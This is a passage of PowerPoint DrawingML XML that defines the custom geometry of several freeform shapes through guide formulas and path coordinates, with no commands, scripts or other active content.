                  <a:gd name="T56" fmla="*/ 509 w 668"/>
                  <a:gd name="T57" fmla="*/ 236 h 663"/>
                  <a:gd name="T58" fmla="*/ 509 w 668"/>
                  <a:gd name="T59" fmla="*/ 236 h 663"/>
                  <a:gd name="T60" fmla="*/ 498 w 668"/>
                  <a:gd name="T61" fmla="*/ 221 h 663"/>
                  <a:gd name="T62" fmla="*/ 488 w 668"/>
                  <a:gd name="T63" fmla="*/ 210 h 663"/>
                  <a:gd name="T64" fmla="*/ 472 w 668"/>
                  <a:gd name="T65" fmla="*/ 205 h 663"/>
                  <a:gd name="T66" fmla="*/ 462 w 668"/>
                  <a:gd name="T67" fmla="*/ 199 h 663"/>
                  <a:gd name="T68" fmla="*/ 446 w 668"/>
                  <a:gd name="T69" fmla="*/ 199 h 663"/>
                  <a:gd name="T70" fmla="*/ 425 w 668"/>
                  <a:gd name="T71" fmla="*/ 205 h 663"/>
                  <a:gd name="T72" fmla="*/ 388 w 668"/>
                  <a:gd name="T73" fmla="*/ 221 h 663"/>
                  <a:gd name="T74" fmla="*/ 79 w 668"/>
                  <a:gd name="T75" fmla="*/ 425 h 663"/>
                  <a:gd name="T76" fmla="*/ 0 w 668"/>
                  <a:gd name="T77" fmla="*/ 305 h 663"/>
                  <a:gd name="T78" fmla="*/ 472 w 668"/>
                  <a:gd name="T79" fmla="*/ 0 h 663"/>
                  <a:gd name="T80" fmla="*/ 546 w 668"/>
                  <a:gd name="T81" fmla="*/ 115 h 6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68" h="663">
                    <a:moveTo>
                      <a:pt x="546" y="115"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="488" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="509" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="115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32" name="Freeform 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2855913" y="5280025"/>
                <a:ext cx="206375" cy="190500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 574"/>
                  <a:gd name="T1" fmla="*/ 251 h 531"/>
                  <a:gd name="T2" fmla="*/ 153 w 574"/>
                  <a:gd name="T3" fmla="*/ 283 h 531"/>
                  <a:gd name="T4" fmla="*/ 126 w 574"/>
                  <a:gd name="T5" fmla="*/ 314 h 531"/>
                  <a:gd name="T6" fmla="*/ 116 w 574"/>
                  <a:gd name="T7" fmla="*/ 351 h 531"/>
                  <a:gd name="T8" fmla="*/ 121 w 574"/>
                  <a:gd name="T9" fmla="*/ 367 h 531"/>
                  <a:gd name="T10" fmla="*/ 126 w 574"/>
                  <a:gd name="T11" fmla="*/ 383 h 531"/>
                  <a:gd name="T12" fmla="*/ 153 w 574"/>
                  <a:gd name="T13" fmla="*/ 404 h 531"/>
                  <a:gd name="T14" fmla="*/ 179 w 574"/>
                  <a:gd name="T15" fmla="*/ 409 h 531"/>
                  <a:gd name="T16" fmla="*/ 216 w 574"/>
                  <a:gd name="T17" fmla="*/ 404 h 531"/>
                  <a:gd name="T18" fmla="*/ 336 w 574"/>
                  <a:gd name="T19" fmla="*/ 482 h 531"/>
                  <a:gd name="T20" fmla="*/ 294 w 574"/>
                  <a:gd name="T21" fmla="*/ 508 h 531"/>
                  <a:gd name="T22" fmla="*/ 221 w 574"/>
                  <a:gd name="T23" fmla="*/ 530 h 531"/>
                  <a:gd name="T24" fmla="*/ 184 w 574"/>
                  <a:gd name="T25" fmla="*/ 530 h 531"/>
                  <a:gd name="T26" fmla="*/ 116 w 574"/>
                  <a:gd name="T27" fmla="*/ 503 h 531"/>
                  <a:gd name="T28" fmla="*/ 53 w 574"/>
                  <a:gd name="T29" fmla="*/ 440 h 531"/>
                  <a:gd name="T30" fmla="*/ 32 w 574"/>
                  <a:gd name="T31" fmla="*/ 414 h 531"/>
                  <a:gd name="T32" fmla="*/ 6 w 574"/>
                  <a:gd name="T33" fmla="*/ 356 h 531"/>
                  <a:gd name="T34" fmla="*/ 0 w 574"/>
                  <a:gd name="T35" fmla="*/ 330 h 531"/>
                  <a:gd name="T36" fmla="*/ 6 w 574"/>
                  <a:gd name="T37" fmla="*/ 283 h 531"/>
                  <a:gd name="T38" fmla="*/ 16 w 574"/>
                  <a:gd name="T39" fmla="*/ 236 h 531"/>
                  <a:gd name="T40" fmla="*/ 42 w 574"/>
                  <a:gd name="T41" fmla="*/ 194 h 531"/>
                  <a:gd name="T42" fmla="*/ 79 w 574"/>
                  <a:gd name="T43" fmla="*/ 157 h 531"/>
                  <a:gd name="T44" fmla="*/ 163 w 574"/>
                  <a:gd name="T45" fmla="*/ 89 h 531"/>
                  <a:gd name="T46" fmla="*/ 253 w 574"/>
                  <a:gd name="T47" fmla="*/ 31 h 531"/>
                  <a:gd name="T48" fmla="*/ 300 w 574"/>
                  <a:gd name="T49" fmla="*/ 10 h 531"/>
                  <a:gd name="T50" fmla="*/ 347 w 574"/>
                  <a:gd name="T51" fmla="*/ 0 h 531"/>
                  <a:gd name="T52" fmla="*/ 394 w 574"/>
                  <a:gd name="T53" fmla="*/ 4 h 531"/>
                  <a:gd name="T54" fmla="*/ 436 w 574"/>
                  <a:gd name="T55" fmla="*/ 15 h 531"/>
                  <a:gd name="T56" fmla="*/ 457 w 574"/>
                  <a:gd name="T57" fmla="*/ 31 h 531"/>
                  <a:gd name="T58" fmla="*/ 504 w 574"/>
                  <a:gd name="T59" fmla="*/ 67 h 531"/>
                  <a:gd name="T60" fmla="*/ 525 w 574"/>
                  <a:gd name="T61" fmla="*/ 94 h 531"/>
                  <a:gd name="T62" fmla="*/ 567 w 574"/>
                  <a:gd name="T63" fmla="*/ 167 h 531"/>
                  <a:gd name="T64" fmla="*/ 573 w 574"/>
                  <a:gd name="T65" fmla="*/ 188 h 531"/>
                  <a:gd name="T66" fmla="*/ 562 w 574"/>
                  <a:gd name="T67" fmla="*/ 272 h 531"/>
                  <a:gd name="T68" fmla="*/ 541 w 574"/>
                  <a:gd name="T69" fmla="*/ 314 h 531"/>
                  <a:gd name="T70" fmla="*/ 510 w 574"/>
                  <a:gd name="T71" fmla="*/ 351 h 531"/>
                  <a:gd name="T72" fmla="*/ 420 w 574"/>
                  <a:gd name="T73" fmla="*/ 430 h 531"/>
                  <a:gd name="T74" fmla="*/ 226 w 574"/>
                  <a:gd name="T75" fmla="*/ 220 h 531"/>
                  <a:gd name="T76" fmla="*/ 426 w 574"/>
                  <a:gd name="T77" fmla="*/ 251 h 531"/>
                  <a:gd name="T78" fmla="*/ 441 w 574"/>
                  <a:gd name="T79" fmla="*/ 236 h 531"/>
                  <a:gd name="T80" fmla="*/ 452 w 574"/>
                  <a:gd name="T81" fmla="*/ 214 h 531"/>
                  <a:gd name="T82" fmla="*/ 457 w 574"/>
                  <a:gd name="T83" fmla="*/ 183 h 531"/>
                  <a:gd name="T84" fmla="*/ 457 w 574"/>
                  <a:gd name="T85" fmla="*/ 167 h 531"/>
                  <a:gd name="T86" fmla="*/ 447 w 574"/>
                  <a:gd name="T87" fmla="*/ 151 h 531"/>
                  <a:gd name="T88" fmla="*/ 415 w 574"/>
                  <a:gd name="T89" fmla="*/ 125 h 531"/>
                  <a:gd name="T90" fmla="*/ 400 w 574"/>
                  <a:gd name="T91" fmla="*/ 125 h 531"/>
                  <a:gd name="T92" fmla="*/ 383 w 574"/>
                  <a:gd name="T93" fmla="*/ 125 h 531"/>
                  <a:gd name="T94" fmla="*/ 347 w 574"/>
                  <a:gd name="T95" fmla="*/ 136 h 531"/>
                  <a:gd name="T96" fmla="*/ 294 w 574"/>
                  <a:gd name="T97" fmla="*/ 173 h 531"/>
                  <a:gd name="T98" fmla="*/ 383 w 574"/>
                  <a:gd name="T99" fmla="*/ 288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74" h="531">
                    <a:moveTo>
                      <a:pt x="189" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="253" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="251"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="426" y="251"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="183"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="251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33" name="Freeform 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2947988" y="5394325"/>
                <a:ext cx="225425" cy="171450"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 515 w 626"/>
                  <a:gd name="T1" fmla="*/ 104 h 478"/>
                  <a:gd name="T2" fmla="*/ 457 w 626"/>
                  <a:gd name="T3" fmla="*/ 152 h 478"/>
                  <a:gd name="T4" fmla="*/ 457 w 626"/>
                  <a:gd name="T5" fmla="*/ 157 h 478"/>
                  <a:gd name="T6" fmla="*/ 457 w 626"/>
                  <a:gd name="T7" fmla="*/ 157 h 478"/>
                  <a:gd name="T8" fmla="*/ 499 w 626"/>
                  <a:gd name="T9" fmla="*/ 152 h 478"/>
                  <a:gd name="T10" fmla="*/ 541 w 626"/>
                  <a:gd name="T11" fmla="*/ 152 h 478"/>
                  <a:gd name="T12" fmla="*/ 541 w 626"/>
                  <a:gd name="T13" fmla="*/ 152 h 478"/>
                  <a:gd name="T14" fmla="*/ 562 w 626"/>
                  <a:gd name="T15" fmla="*/ 157 h 478"/>
                  <a:gd name="T16" fmla="*/ 578 w 626"/>
                  <a:gd name="T17" fmla="*/ 168 h 478"/>
                  <a:gd name="T18" fmla="*/ 594 w 626"/>
                  <a:gd name="T19" fmla="*/ 178 h 478"/>
                  <a:gd name="T20" fmla="*/ 610 w 626"/>
                  <a:gd name="T21" fmla="*/ 194 h 478"/>
                  <a:gd name="T22" fmla="*/ 610 w 626"/>
                  <a:gd name="T23" fmla="*/ 194 h 478"/>
                  <a:gd name="T24" fmla="*/ 620 w 626"/>
                  <a:gd name="T25" fmla="*/ 204 h 478"/>
                  <a:gd name="T26" fmla="*/ 620 w 626"/>
                  <a:gd name="T27" fmla="*/ 204 h 478"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 215 h 478"/>
                  <a:gd name="T30" fmla="*/ 520 w 626"/>
                  <a:gd name="T31" fmla="*/ 304 h 478"/>
                  <a:gd name="T32" fmla="*/ 520 w 626"/>
                  <a:gd name="T33" fmla="*/ 304 h 478"/>
                  <a:gd name="T34" fmla="*/ 510 w 626"/>
                  <a:gd name="T35" fmla="*/ 288 h 478"/>
                  <a:gd name="T36" fmla="*/ 510 w 626"/>
                  <a:gd name="T37" fmla="*/ 288 h 478"/>
                  <a:gd name="T38" fmla="*/ 494 w 626"/>
                  <a:gd name="T39" fmla="*/ 272 h 478"/>
                  <a:gd name="T40" fmla="*/ 494 w 626"/>
                  <a:gd name="T41" fmla="*/ 272 h 478"/>
                  <a:gd name="T42" fmla="*/ 467 w 626"/>
                  <a:gd name="T43" fmla="*/ 246 h 478"/>
                  <a:gd name="T44" fmla="*/ 467 w 626"/>
                  <a:gd name="T45" fmla="*/ 246 h 478"/>
                  <a:gd name="T46" fmla="*/ 447 w 626"/>
                  <a:gd name="T47" fmla="*/ 236 h 478"/>
                  <a:gd name="T48" fmla="*/ 431 w 626"/>
                  <a:gd name="T49" fmla="*/ 231 h 478"/>
                  <a:gd name="T50" fmla="*/ 431 w 626"/>
                  <a:gd name="T51" fmla="*/ 231 h 478"/>
                  <a:gd name="T52" fmla="*/ 410 w 626"/>
                  <a:gd name="T53" fmla="*/ 231 h 478"/>
                  <a:gd name="T54" fmla="*/ 389 w 626"/>
                  <a:gd name="T55" fmla="*/ 231 h 478"/>
                  <a:gd name="T56" fmla="*/ 389 w 626"/>
                  <a:gd name="T57" fmla="*/ 231 h 478"/>
                  <a:gd name="T58" fmla="*/ 368 w 626"/>
                  <a:gd name="T59" fmla="*/ 241 h 478"/>
                  <a:gd name="T60" fmla="*/ 347 w 626"/>
                  <a:gd name="T61" fmla="*/ 257 h 478"/>
                  <a:gd name="T62" fmla="*/ 95 w 626"/>
                  <a:gd name="T63" fmla="*/ 477 h 478"/>
                  <a:gd name="T64" fmla="*/ 0 w 626"/>
                  <a:gd name="T65" fmla="*/ 367 h 478"/>
                  <a:gd name="T66" fmla="*/ 426 w 626"/>
                  <a:gd name="T67" fmla="*/ 0 h 478"/>
                  <a:gd name="T68" fmla="*/ 515 w 626"/>
                  <a:gd name="T69" fmla="*/ 104 h 4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26" h="478">
                    <a:moveTo>
                      <a:pt x="515" y="104"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="104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34" name="Freeform 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3041650" y="5505450"/>
                <a:ext cx="215900" cy="227013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 263 w 599"/>
                  <a:gd name="T1" fmla="*/ 53 h 631"/>
                  <a:gd name="T2" fmla="*/ 331 w 599"/>
                  <a:gd name="T3" fmla="*/ 5 h 631"/>
                  <a:gd name="T4" fmla="*/ 362 w 599"/>
                  <a:gd name="T5" fmla="*/ 0 h 631"/>
                  <a:gd name="T6" fmla="*/ 399 w 599"/>
                  <a:gd name="T7" fmla="*/ 0 h 631"/>
                  <a:gd name="T8" fmla="*/ 462 w 599"/>
                  <a:gd name="T9" fmla="*/ 26 h 631"/>
                  <a:gd name="T10" fmla="*/ 494 w 599"/>
                  <a:gd name="T11" fmla="*/ 48 h 631"/>
                  <a:gd name="T12" fmla="*/ 520 w 599"/>
                  <a:gd name="T13" fmla="*/ 74 h 631"/>
                  <a:gd name="T14" fmla="*/ 583 w 599"/>
                  <a:gd name="T15" fmla="*/ 158 h 631"/>
                  <a:gd name="T16" fmla="*/ 598 w 599"/>
                  <a:gd name="T17" fmla="*/ 195 h 631"/>
                  <a:gd name="T18" fmla="*/ 598 w 599"/>
                  <a:gd name="T19" fmla="*/ 231 h 631"/>
                  <a:gd name="T20" fmla="*/ 578 w 599"/>
                  <a:gd name="T21" fmla="*/ 289 h 631"/>
                  <a:gd name="T22" fmla="*/ 562 w 599"/>
                  <a:gd name="T23" fmla="*/ 315 h 631"/>
                  <a:gd name="T24" fmla="*/ 321 w 599"/>
                  <a:gd name="T25" fmla="*/ 546 h 631"/>
                  <a:gd name="T26" fmla="*/ 278 w 599"/>
                  <a:gd name="T27" fmla="*/ 588 h 631"/>
                  <a:gd name="T28" fmla="*/ 257 w 599"/>
                  <a:gd name="T29" fmla="*/ 630 h 631"/>
                  <a:gd name="T30" fmla="*/ 163 w 599"/>
                  <a:gd name="T31" fmla="*/ 530 h 631"/>
                  <a:gd name="T32" fmla="*/ 174 w 599"/>
                  <a:gd name="T33" fmla="*/ 504 h 631"/>
                  <a:gd name="T34" fmla="*/ 189 w 599"/>
                  <a:gd name="T35" fmla="*/ 478 h 631"/>
                  <a:gd name="T36" fmla="*/ 147 w 599"/>
                  <a:gd name="T37" fmla="*/ 483 h 631"/>
                  <a:gd name="T38" fmla="*/ 110 w 599"/>
                  <a:gd name="T39" fmla="*/ 473 h 631"/>
                  <a:gd name="T40" fmla="*/ 74 w 599"/>
                  <a:gd name="T41" fmla="*/ 452 h 631"/>
                  <a:gd name="T42" fmla="*/ 42 w 599"/>
                  <a:gd name="T43" fmla="*/ 420 h 631"/>
                  <a:gd name="T44" fmla="*/ 5 w 599"/>
                  <a:gd name="T45" fmla="*/ 368 h 631"/>
                  <a:gd name="T46" fmla="*/ 0 w 599"/>
                  <a:gd name="T47" fmla="*/ 336 h 631"/>
                  <a:gd name="T48" fmla="*/ 5 w 599"/>
                  <a:gd name="T49" fmla="*/ 310 h 631"/>
                  <a:gd name="T50" fmla="*/ 27 w 599"/>
                  <a:gd name="T51" fmla="*/ 257 h 631"/>
                  <a:gd name="T52" fmla="*/ 42 w 599"/>
                  <a:gd name="T53" fmla="*/ 236 h 631"/>
                  <a:gd name="T54" fmla="*/ 63 w 599"/>
                  <a:gd name="T55" fmla="*/ 216 h 631"/>
                  <a:gd name="T56" fmla="*/ 116 w 599"/>
                  <a:gd name="T57" fmla="*/ 173 h 631"/>
